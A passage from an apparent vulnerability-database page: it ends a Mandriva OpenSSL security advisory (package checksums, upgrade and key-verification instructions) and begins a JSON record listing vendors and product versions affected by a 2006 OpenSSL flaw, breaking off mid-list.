    Corporate 4.0/X86_64: 746e5e916d1e05379373138a5db20923 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mlcs4.x86_64.rpm a2b1d750075a32fe8badbdf1f7febafe corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm 47c464cf890a004f772c1db3e839fa12 corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm 6d71d2358738be9967b2dfe19d3642f1 corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm 22890554d3096ce596eeec7393ee3fcf corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 679fe740859fa35b2bb77b19c4a0e787 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 1030a6124a9fa4fd5a41bdff077301bf corporate/4.0/x86_64/openssl-0.9.7g-2.4.20060mlcs4.x86_64.rpm b65dbbd9fb3d74d302478640476a2cd2 corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: 19055eda58e1f75814e594ce7709a710 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.6.M20mdk.i586.rpm abfe548617969f619aec5b0e807f1f67 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.M20mdk.i586.rpm 92e7515c9125367a79fdb490f5b39cd4 mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.M20mdk.i586.rpm 847eecb1d07e4cab3d1de1452103c3a0 mnf/2.0/i586/openssl-0.9.7c-3.6.M20mdk.i586.rpm b6b67fa82d7119cde7ab7816aed17059 mnf/2.0/SRPMS/openssl-0.9.7c-3.6.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)

    iD8DBQFFHA4hmqjQ0CJFipgRApknAJ9Ybd8xjfkR+RL1fWEI2Fgn/KIuqACeOH/0 wB09L3fylyiHgrXvSV6VL7A= =/+dm -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200609-1114",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
